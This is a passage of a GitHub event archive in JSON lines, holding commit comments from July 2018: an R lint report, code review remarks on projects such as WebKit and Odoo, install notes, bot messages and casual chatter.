selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-18T11:32:19Z"}
{"id":"7982360951","type":"CommitCommentEvent","actor":{"login":"finp"},"repo":{"name":"aidenkeating/mobile-docs"},"payload":{"comment":{"id":29748261,"position":32,"line":38,"path":"modules/ROOT/pages/_partials/generic-obtaining-the-mobile-sdk-config-file.adoc","commit_id":"48e3ee85d1bb2adc42fc6409dd38fd9963b61656","created_at":"2018-07-18T11:33:29Z","updated_at":"2018-07-18T11:33:29Z","author_association":"NONE","body":"FYI I've reversed this edit in https://github.com/aerogear/mobile-docs/pull/296"}},"created_at":"2018-07-18T11:33:29Z"}
{"id":"7982363870","type":"CommitCommentEvent","actor":{"login":"badmaan"},"repo":{"name":"RaphielGang/kat_kernel_reworks"},"payload":{"comment":{"id":29748266,"position":null,"line":null,"path":null,"commit_id":"bd28af98b5f3dae9962dbbe9f2d4c1b84022dde4","created_at":"2018-07-18T11:34:10Z","updated_at":"2018-07-18T11:34:10Z","author_association":"NONE","body":"fix dis"}},"created_at":"2018-07-18T11:34:10Z"}
{"id":"7982363927","type":"CommitCommentEvent","actor":{"login":"odimon21"},"repo":{"name":"odimon21/arduino"},"payload":{"comment":{"id":29748267,"position":null,"line":null,"path":null,"commit_id":"4ecdff27de08a668a6703ee6b9ee370cbc98a6d5","created_at":"2018-07-18T11:34:11Z","updated_at":"2018-07-18T11:34:11Z","author_association":"OWNER","body":"туц\r\n"}},"created_at":"2018-07-18T11:34:11Z"}
{"id":"7982364399","type":"CommitCommentEvent","actor":{"login":"odimon21"},"repo":{"name":"odimon21/arduino"},"payload":{"comment":{"id":29748269,"position":null,"line":null,"path":null,"commit_id":"4ecdff27de08a668a6703ee6b9ee370cbc98a6d5","created_at":"2018-07-18T11:34:16Z","updated_at":"2018-07-18T11:34:16Z","author_association":"OWNER","body":"ав"}},"created_at":"2018-07-18T11:34:16Z"}
{"id":"7982368219","type":"CommitCommentEvent","actor":{"login":"lucasfranzolin"},"repo":{"name":"lucasfranzolin/finance-tracker"},"payload":{"comment":{"id":29748280,"position":null,"line":null,"path":null,"commit_id":"79f581c3b87b372daad458044679140a0c8726f2","created_at":"2018-07-18T11:35:10Z","updated_at":"2018-07-18T11:35:10Z","author_association":"OWNER","body":"rails generate devise:install\r\nrails generate devise User\r\nrails db:migrate"}},"created_at":"2018-07-18T11:35:10Z"}
{"id":"7982371551","type":"CommitCommentEvent","actor":{"login":"Elkasitu"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29748291,"position":49,"line":594,"path":"odoo/addons/base/ir/ir_model.py","commit_id":"ca44dff7d2cb4d60c61a24bdf3d306cde79c64b4","created_at":"2018-07-18T11:35:53Z","updated_at":"2018-07-18T11:35:53Z","author_association":"NONE","body":"calculate related and compute together + use `field.resolve_deps(model)`"}},"created_at":"2018-07-18T11:35:53Z"}
{"id":"7982373735","type":"CommitCommentEvent","actor":{"login":"badmaan"},"repo":{"name":"RaphielGang/kat_kernel_reworks"},"payload":{"comment":{"id":29748295,"position":null,"line":null,"path":null,"commit_id":"a94422012a82e1da44ee1276b5b67d9b4190b311","created_at":"2018-07-18T11:36:22Z","updated_at":"2018-07-18T11:36:22Z","author_association":"NONE","body":"fix this plox"}},"created_at":"2018-07-18T11:36:22Z"}
{"id":"7982375033","type":"CommitCommentEvent","actor":{"login":"badmaan"},"repo":{"name":"RaphielGang/kat_kernel_reworks"},"payload":{"comment":{"id":29748298,"position":null,"line":null,"path":null,"commit_id":"6e3e2b8504c39d4d443e3ba72f1b25352e94f3a1","created_at":"2018-07-18T11:36:39Z","updated_at":"2018-07-18T11:36:39Z","author_association":"NONE","body":"fix it plox"}},"created_at":"2018-07-18T11:36:39Z"}
{"id":"7982375593","type":"CommitCommentEvent","actor":{"login":"aysenurdogan"},"repo":{"name":"aysenurdogan/mekikmotors"},"payload":{"comment":{"id":29748299,"position":null,"line":null,"path":null,"commit_id":"8748018b8ae33d3ef5b80cd0c2f98db45b7521d9","created_at":"2018-07-18T11:36:46Z","updated_at":"2018-07-18T11:36:46Z","author_association":"OWNER","body":"+Install\r\n+\r\n+git clone https://github.com/aysenurdogan/mekikmotors.git\r\n+php install.php\r\n+import mekikmotors.sql in mysql\r\n+login to the admin panel with username: admin@admin.com password: password"}},"created_at":"2018-07-18T11:36:46Z"}
{"id":"7982377981","type":"CommitCommentEvent","actor":{"login":"Boogier"},"repo":{"name":"pusher-community/pusher-websocket-dotnet"},"payload":{"comment":{"id":29748301,"position":null,"line":null,"path":null,"commit_id":"5cdd09fec9c8cd3529a4e11911dd9341b601d80d","created_at":"2018-07-18T11:37:18Z","updated_at":"2018-07-18T11:37:18Z","author_association":"CONTRIBUTOR","body":"Hi imaji!\r\n\r\nIs it compulsory to move the project to 4.6.2?\r\nI regret because my project is 4.5 :(\r\n\r\n"}},"created_at":"2018-07-18T11:37:18Z"}
{"id":"7982379883","type":"CommitCommentEvent","actor":{"login":"Baddhizm"},"repo":{"name":"Baddhizm/simple-mapper"},"payload":{"comment":{"id":29748305,"position":null,"line":null,"path":null,"commit_id":"ffeda28967f0ee1231740cb84f24a404c95717e9","created_at":"2018-07-18T11:37:45Z","updated_at":"2018-07-18T11:37:45Z","author_association":"OWNER","body":"Oops"}},"created_at":"2018-07-18T11:37:45Z"}
{"id":"7982380515","type":"CommitCommentEvent","actor":{"login":"badmaan"},"repo":{"name":"RaphielGang/kat_kernel_reworks"},"payload":{"comment":{"id":29748306,"position":null,"line":null,"path":null,"commit_id":"79512fa0d9013299b12e4d1ac5561000f6b6741a","created_at":"2018-07-18T11:37:54Z","updated_at":"2018-07-18T11:37:54Z","author_association":"NONE","body":"fix dis"}},"created_at":"2018-07-18T11:37:54Z"}
{"id":"7982380736","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29748307,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T11:37:56Z","updated_at":"2018-07-18T11:37:56Z","author_association":"NONE","body":"reset before people see it 👀"}},"created_at":"2018-07-18T11:37:56Z"}
{"id":"7982382047","type":"CommitCommentEvent","actor":{"login":"Kelin2025"},"repo":{"name":"nanoutils/nanoutils"},"payload":{"comment":{"id":29748309,"position":null,"line":null,"path":null,"commit_id":"683e6fc287ee279ee3e1029cbe4643a6dedaacdd","created_at":"2018-07-18T11:38:15Z","updated_at":"2018-07-18T11:38:15Z","author_association":"MEMBER","body":"Good catch, by the way 😎😎😎 "}},"created_at":"2018-07-18T11:38:15Z"}
{"id":"7982393166","type":"CommitCommentEvent","actor":{"login":"XUSushi"},"repo":{"name":"XUSushi/wordlist"},"payload":{"comment":{"id":29748334,"position":null,"line":null,"path":null,"commit_id":"8e41e6acec8ea1517443f394c1762d2eb6912252","created_at":"2018-07-18T11:40:45Z","updated_at":"2018-07-18T11:40:45Z","author_association":"OWNER","body":"使用nltk做wordlist"}},"created_at":"2018-07-18T11:40:45Z"}
{"id":"7982394961","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"yakamara/ydeploy"},"payload":{"comment":{"id":29748340,"position":33,"line":33,"path":"deployer/tasks/local/setup.php","commit_id":"785d5afbf5107d7dabe4e6ba2509bc099a90aba4","created_at":"2018-07-18T11:41:09Z","updated_at":"2018-07-18T11:41:09Z","author_association":"CONTRIBUTOR","body":"Ein mysql dump erzeugt einen table lock solange der export läuft. Bei moderatem traffic reicht das das für einige minuten von der db keine antworten mehr kommen"}},"created_at":"2018-07-18T11:41:09Z"}
{"id":"7982395264","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"xbulat/ror_full_9"},"payload":{"comment":{"id":29748341,"position":38,"line":38,"path":"lesson1/3_quadratic_equation.rb","commit_id":"e5a6981bb41ef909ec96cf3b294109e0c244c11c","created_at":"2018-07-18T11:41:12Z","updated_at":"2018-07-18T11:41:12Z","author_association":"NONE","body":"Дважды вычисляется Math.sqrt(d), необходимо сделать так, чтобы вычислялся один раз"}},"created_at":"2018-07-18T11:41:12Z"}
{"id":"7982398287","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"xanlpz/webkit"},"payload":{"comment":{"id":29748347,"position":62,"line":489,"path":"Source/JavaScriptCore/parser/Parser.h","commit_id":"8ab252822efc31201c773f2f2d7fd64a47a93d69","created_at":"2018-07-18T11:41:49Z","updated_at":"2018-07-18T11:41:49Z","author_association":"NONE","body":"Can we rename \"purgePrivateNames\" to something that explains the name is no longer going to be considered \"invalid\"?"}},"created_at":"2018-07-18T11:41:49Z"}
{"id":"7982400736","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"yakamara/ydeploy"},"payload":{"comment":{"id":29748354,"position":null,"line":null,"path":null,"commit_id":"785d5afbf5107d7dabe4e6ba2509bc099a90aba4","created_at":"2018-07-18T11:42:18Z","updated_at":"2018-07-18T11:42:18Z","author_association":"CONTRIBUTOR","body":"Ich hab überlegt ob man ein separates eigenständiges cli command schreibt (sparates projekt)dass man anstelle von mysqldump nutzen kann"}},"created_at":"2018-07-18T11:42:18Z"}
{"id":"7982402880","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/sematext-agent-docker"},"payload":{"comment":{"id":29748359,"position":5,"line":101,"path":"lib/dockerAgent.js","commit_id":"736c0a4b08586a4022dab229d56afbd8d33e1059","created_at":"2018-07-18T11:42:46Z","updated_at":"2018-07-18T11:42:46Z","author_association":"MEMBER","body":"@megastef \"a\" was correct. kuberntes is not."}},"created_at":"2018-07-18T11:42:46Z"}
{"id":"7982403635","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29748361,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-18T11:42:57Z","updated_at":"2018-07-18T11:42:57Z","author_association":"OWNER","body":"So I think we have \"confirmed\" now that old n-t-roff code behavior has not changed.\r\n\r\nNext thing to confirm is that n-t-roff code does also behave exactly like typo-tests code. What is your opinion, do the new features of typo-tests also work in n-t-roff?\r\n\r\nWhat is the issue that you have with pulls to GitHub? What is the error message?"}},"created_at":"2018-07-18T11:42:57Z"}
{"id":"7982407251","type":"CommitCommentEvent","actor":{"login":"vincent-cai"},"repo":{"name":"ringcentral/Glipped"},"payload":{"comment":{"id":29748365,"position":null,"line":null,"path":null,"commit_id":"078d5543375bdba7c4207bdcea9ca1788ccf0d61","created_at":"2018-07-18T11:43:46Z","updated_at":"2018-07-18T11:43:46Z","author_association":"COLLABORATOR","body":"Hi @grokify, when would these changes be deployed on production?"}},"created_at":"2018-07-18T11:43:46Z"}
{"id":"7982407863","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"hbenl/vscode-jasmine-test-adapter"},"payload":{"comment":{"id":29748368,"position":15,"line":14,"path":"src/worker/loadTests.ts","commit_id":"6296cabbb3a7eedf8a113c90e088dfdfabdcc9fb","created_at":"2018-07-18T11:43:54Z","updated_at":"2018-07-18T11:43:54Z","author_association":"CONTRIBUTOR","body":"@hbenl the order was very important here, as if the user changes the reporter in the helper file and removes all other reported, this one will be removed as well, therefore making this extension not working."}},"created_at":"2018-07-18T11:43:54Z"}
{"id":"7982409182","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"xanlpz/webkit"},"payload":{"comment":{"id":29748371,"position":22,"line":4947,"path":"Source/JavaScriptCore/parser/Parser.cpp","commit_id":"8ab252822efc31201c773f2f2d7fd64a47a93d69","created_at":"2018-07-18T11:44:12Z","updated_at":"2018-07-18T11:44:12Z","author_association":"NONE","body":"\"declareUsedPrivateName\" doesn't match the convention in Scope, how about just \"usePrivateName\"?"}},"created_at":"2018-07-18T11:44:12Z"}
{"id":"7982416074","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"xanlpz/webkit"},"payload":{"comment":{"id":29748391,"position":21,"line":4946,"path":"Source/JavaScriptCore/parser/Parser.cpp","commit_id":"8ab252822efc31201c773f2f2d7fd64a47a93d69","created_at":"2018-07-18T11:45:43Z","updated_at":"2018-07-18T11:45:43Z","author_association":"NONE","body":"This doesn't take outer class scopes into consideration.\r\n\r\nI think it makes sense to separate this collection from the Scope stack, so that it's  less pointer chasing to traverse, but of course that would make Parser bigger. Either way, I think we should do the pointer chasing and check the outer   scopes too."}},"created_at":"2018-07-18T11:45:43Z"}
{"id":"7982416353","type":"CommitCommentEvent","actor":{"login":"ngeiswei"},"repo":{"name":"rTreutlein/cogutils"},"payload":{"comment":{"id":29748396,"position":62,"line":144,"path":"opencog/util/Counter.h","commit_id":"b8749469064220a93cdb4f74e0ae2e306260de3d","created_at":"2018-07-18T11:45:47Z","updated_at":"2018-07-18T11:45:47Z","author_association":"NONE","body":"I don't think this the correct behavior\r\n```c++\r\nct * n\r\n```\r\nis gonna modify `ct` while I think the user would except it to create create a new counter (with all its values multipled by `n`). I think you want to implement `operator*=` and inherit `Counter` from `boost::multipliable2`, see https://www.boost.org/doc/libs/1_67_0/libs/utility/operators.htm\r\n\r\nAlso the code would be simpler and more efficient with\r\n```c++\r\nv.second *= num;\r\n```"}},"created_at":"2018-07-18T11:45:47Z"}
{"id":"7982416436","type":"CommitCommentEvent","actor":{"login":"ohlookitsderpy"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29748397,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T11:45:49Z","updated_at":"2018-07-18T11:45:49Z","author_association":"NONE","body":"am going to spamme dicksword api with token!111"}},"created_at":"2018-07-18T11:45:49Z"}
{"id":"7982417640","type":"CommitCommentEvent","actor":{"login":"ohlookitsderpy"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29748401,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T11:46:06Z","updated_at":"2018-07-18T11:46:06Z","author_association":"NONE","body":"@ b1nzy pls ban "}},"created_at":"2018-07-18T11:46:06Z"}
{"id":"7982418801","type":"CommitCommentEvent","actor":{"login":"ondergur"},"repo":{"name":"ondergur/CompanyHR-internshipProject"},"payload":{"comment":{"id":29748405,"position":26,"line":59,"path":"app/Http/Controllers/CompanyController.php","commit_id":"58191164906a966608577edccc0fc91218dbd2ac","created_at":"2018-07-18T11:46:21Z","updated_at":"2018-07-18T11:46:21Z","author_association":"OWNER","body":"How can i use this code when i am trying to upload images?"}},"created_at":"2018-07-18T11:46:21Z"}
{"id":"7982418917","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"xanlpz/webkit"},"payload":{"comment":{"id":29748406,"position":4,"line":2782,"path":"Source/JavaScriptCore/parser/Parser.cpp","commit_id":"8ab252822efc31201c773f2f2d7fd64a47a93d69","created_at":"2018-07-18T11:46:22Z","updated_at":"2018-07-18T11:46:22Z","author_association":"NONE","body":"what if we make this generic, like \"setIsPrivateNameEnvironment\"? This way, the proposals to allow private names declared elsewhere in code will make sense, too."}},"created_at":"2018-07-18T11:46:22Z"}
{"id":"7982421740","type":"CommitCommentEvent","actor":{"login":"ngeiswei"},"repo":{"name":"rTreutlein/cogutils"},"payload":{"comment":{"id":29748417,"position":8,"line":151,"path":"opencog/util/Counter.h","commit_id":"c742c6850d10d1c19dbd8e48db5c8dad375b75e6","created_at":"2018-07-18T11:46:59Z","updated_at":"2018-07-18T11:46:59Z","author_association":"NONE","body":"Similar remark as in https://github.com/rTreutlein/cogutils/commit/b8749469064220a93cdb4f74e0ae2e306260de3d#r29748396"}},"created_at":"2018-07-18T11:46:59Z"}
{"id":"7982421953","type":"CommitCommentEvent","actor":{"login":"fanyinsir"},"repo":{"name":"fanyinsir/fanyinsir.github.io"},"payload":{"comment":{"id":29748418,"position":null,"line":null,"path":null,"commit_id":"a2d4b6e452e95cfa2c4e8333f31cfcc50cbe1eb5","created_at":"2018-07-18T11:47:01Z","updated_at":"2018-07-18T11:47:01Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-18T11:47:01Z"}
{"id":"7982422451","type":"CommitCommentEvent","actor":{"login":"lwierzbi"},"repo":{"name":"lwierzbi/radio-pi"},"payload":{"comment":{"id":29748420,"position":18,"line":18,"path":"test.js","commit_id":"2915b0b3c461c9e597dd429dce68929da342f13a","created_at":"2018-07-18T11:47:08Z","updated_at":"2018-07-18T11:47:08Z","author_association":"OWNER","body":"comment1"}},"created_at":"2018-07-18T11:47:08Z"}
{"id":"7982423249","type":"CommitCommentEvent","actor":{"login":"lwierzbi"},"repo":{"name":"lwierzbi/radio-pi"},"payload":{"comment":{"id":29748421,"position":20,"line":20,"path":"test.js","commit_id":"2915b0b3c461c9e597dd429dce68929da342f13a","created_at":"2018-07-18T11:47:18Z","updated_at":"2018-07-18T11:47:18Z","author_association":"OWNER","body":"comment2"}},"created_at":"2018-07-18T11:47:18Z"}
{"id":"7982424513","type":"CommitCommentEvent","actor":{"login":"pratapvardhan"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29748424,"position":81,"line":187,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T11:47:34Z","updated_at":"2018-07-18T11:47:34Z","author_association":"NONE","body":"You seem to be returning only the header, or colum list, but reading the entire file. Is that what you want to do with `read_csv_file`?"}},"created_at":"2018-07-18T11:47:34Z"}
{"id":"7982424644","type":"CommitCommentEvent","actor":{"login":"ksooo"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29748425,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T11:47:36Z","updated_at":"2018-07-18T11:47:36Z","author_association":"NONE","body":"You should increase the addon version number whenever you commit something to master. \r\n\r\nRemember, once your PR to include your addon in kodi addon repository got merged, the latest master of your addon will be pulled automatically for every kodi nightly build. To support your users it's best to have unique version numbers.\r\n\r\nI suggest you add a commit only increasing the version number. Then, I will merge your addon repo PR."}},"created_at":"2018-07-18T11:47:36Z"}
{"id":"7982424860","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"xbulat/ror_full_9"},"payload":{"comment":{"id":29748426,"position":35,"line":35,"path":"lesson1/3_quadratic_equation.rb","commit_id":"e5a6981bb41ef909ec96cf3b294109e0c244c11c","created_at":"2018-07-18T11:47:39Z","updated_at":"2018-07-18T11:47:39Z","author_association":"NONE","body":"А зачем здесь exit 0? Если программа и так завершит выполнение"}},"created_at":"2018-07-18T11:47:39Z"}
{"id":"7982425888","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"xbulat/ror_full_9"},"payload":{"comment":{"id":29748429,"position":11,"line":11,"path":"lesson1/3_quadratic_equation.rb","commit_id":"e5a6981bb41ef909ec96cf3b294109e0c244c11c","created_at":"2018-07-18T11:47:52Z","updated_at":"2018-07-18T11:47:52Z","author_association":"NONE","body":"можно без nil?"}},"created_at":"2018-07-18T11:47:52Z"}
{"id":"7982426802","type":"CommitCommentEvent","actor":{"login":"lukepighetti"},"repo":{"name":"Pigeoncoin/pigeoncoin"},"payload":{"comment":{"id":29748432,"position":69,"line":387,"path":"src/chainparams.cpp","commit_id":"b772a5faf0a87fa4c5f708250d40a75364e601e9","created_at":"2018-07-18T11:48:04Z","updated_at":"2018-07-18T11:48:04Z","author_association":"CONTRIBUTOR","body":"this is technically broken since zawy cannot start under 46 blocks"}},"created_at":"2018-07-18T11:48:04Z"}
{"id":"7982430510","type":"CommitCommentEvent","actor":{"login":"vkakde"},"repo":{"name":"dameiss/wireshark-aeron"},"payload":{"comment":{"id":29748437,"position":null,"line":null,"path":null,"commit_id":"efdbcdc879bb57be53cc6fcb3ba200785211923e","created_at":"2018-07-18T11:48:56Z","updated_at":"2018-07-18T11:48:56Z","author_association":"NONE","body":"Hi, is there ongoing work in the wireshark-aeron project? The dissector does not work optimally on newer versions of Aeron."}},"created_at":"2018-07-18T11:48:56Z"}
{"id":"7982433182","type":"CommitCommentEvent","actor":{"login":"slorber"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29748441,"position":null,"line":null,"path":null,"commit_id":"ae57b25134c4db8be8539a0f0e6e52d46c850339","created_at":"2018-07-18T11:49:30Z","updated_at":"2018-07-18T11:49:30Z","author_association":"CONTRIBUTOR","body":"@janicduplessis what about having a different colors for selection and cursor?\r\n\r\nBasically I want my cursor to be the same color of the text. Which means obviously that selecting the text will make it invisibible (ie, red text on red selection rectangle)"}},"created_at":"2018-07-18T11:49:30Z"}
{"id":"7982436148","type":"CommitCommentEvent","actor":{"login":"lukepighetti"},"repo":{"name":"Pigeoncoin/pigeoncoin"},"payload":{"comment":{"id":29748449,"position":62,"line":147,"path":"src/pow.cpp","commit_id":"b772a5faf0a87fa4c5f708250d40a75364e601e9","created_at":"2018-07-18T11:50:10Z","updated_at":"2018-07-18T11:50:10Z","author_association":"CONTRIBUTOR","body":"not important for us, but for others considering using LWMA, consider limiting `i` so its not negative so you can start using LWMA from the first block. Alternatively, just set LWMA starting height to 50 blocks or so, it's fine."}},"created_at":"2018-07-18T11:50:10Z"}
{"id":"7982437374","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29748455,"position":null,"line":null,"path":null,"commit_id":"b6a60dd6601a6947e00a0a77decd283248ba8a7f","created_at":"2018-07-18T11:50:25Z","updated_at":"2018-07-18T11:50:25Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/b6a60dd6601a6947e00a0a77decd283248ba8a7f#commitcomment-29743680) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/84c1e321ae83deaa6fc8bccc03bc8e30bdc243f5/daily_2018_7_18/report.md). cc @ararslan"}},"created_at":"2018-07-18T11:50:25Z"}
{"id":"7982438391","type":"CommitCommentEvent","actor":{"login":"lwierzbi"},"repo":{"name":"lwierzbi/radio-pi"},"payload":{"comment":{"id":29748459,"position":null,"line":null,"path":null,"commit_id":"2915b0b3c461c9e597dd429dce68929da342f13a","created_at":"2018-07-18T11:50:39Z","updated_at":"2018-07-18T11:50:39Z","author_association":"OWNER","body":"comment1"}},"created_at":"2018-07-18T11:50:39Z"}
{"id":"7982438885","type":"CommitCommentEvent","actor":{"login":"lwierzbi"},"repo":{"name":"lwierzbi/radio-pi"},"payload":{"comment":{"id":29748461,"position":null,"line":null,"path":null,"commit_id":"2915b0b3c461c9e597dd429dce68929da342f13a","created_at":"2018-07-18T11:50:46Z","updated_at":"2018-07-18T11:50:46Z","author_association":"OWNER","body":"comment2"}},"created_at":"2018-07-18T11:50:46Z"}
{"id":"7982439113","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/CloudSigns"},"payload":{"comment":{"id":29748463,"position":null,"line":null,"path":null,"commit_id":"f4fe8f26c270418ba7591a33f32844f678c5c5a4","created_at":"2018-07-18T11:50:49Z","updated_at":"2018-07-18T11:50:49Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ByxNilsGFX/CloudSigns/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `cf8c9082-8a80-11e8-84be-b085f611d587`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-18T11:50:49Z"}
{"id":"7982439415","type":"CommitCommentEvent","actor":{"login":"lwierzbi"},"repo":{"name":"lwierzbi/radio-pi"},"payload":{"comment":{"id":29748464,"position":null,"line":null,"path":null,"commit_id":"2915b0b3c461c9e597dd429dce68929da342f13a","created_at":"2018-07-18T11:50:52Z","updated_at":"2018-07-18T11:50:52Z","author_association":"OWNER","body":"comment3"}},"created_at":"2018-07-18T11:50:52Z"}
{"id":"7982443167","type":"CommitCommentEvent","actor":{"login":"jayvines"},"repo":{"name":"osTicket/osTicket"},"payload":{"comment":{"id":29748491,"position":4,"line":189,"path":"include/class.ostsession.php","commit_id":"424bfc99d93b920f6162b602eeea41125086425d","created_at":"2018-07-18T11:51:44Z","updated_at":"2018-07-18T11:51:44Z","author_association":"NONE","body":"Does anyone know if this was fixed in the latest release 1.10.4 (yesterday)?  or is it still slated for 1.11?"}},"created_at":"2018-07-18T11:51:44Z"}
{"id":"7982443390","type":"CommitCommentEvent","actor":{"login":"yairchu"},"repo":{"name":"WeAreROLI/JUCE"},"payload":{"comment":{"id":29748492,"position":13,"line":411,"path":"extras/Projucer/Source/Project/jucer_Project.h","commit_id":"fefbbc89b4c3816c5be1ead4c4e5a7c7a218335b","created_at":"2018-07-18T11:51:47Z","updated_at":"2018-07-18T11:51:47Z","author_association":"NONE","body":"When merging this into my branch I noticed that this name is inconsistent with the others, which all end with `Value`.\r\n\r\nReporting this with consistency even though fixing it will cause more merge conflicts for me.."}},"created_at":"2018-07-18T11:51:47Z"}
{"id":"7982447433","type":"CommitCommentEvent","actor":{"login":"naloder"},"repo":{"name":"xausky/UnityModManager"},"payload":{"comment":{"id":29748505,"position":null,"line":null,"path":null,"commit_id":"ee9e5f434b4360e19f339973992fc97cd4a873bb","created_at":"2018-07-18T11:52:38Z","updated_at":"2018-07-18T11:52:38Z","author_association":"NONE","body":"果然换内核了?"}},"created_at":"2018-07-18T11:52:38Z"}
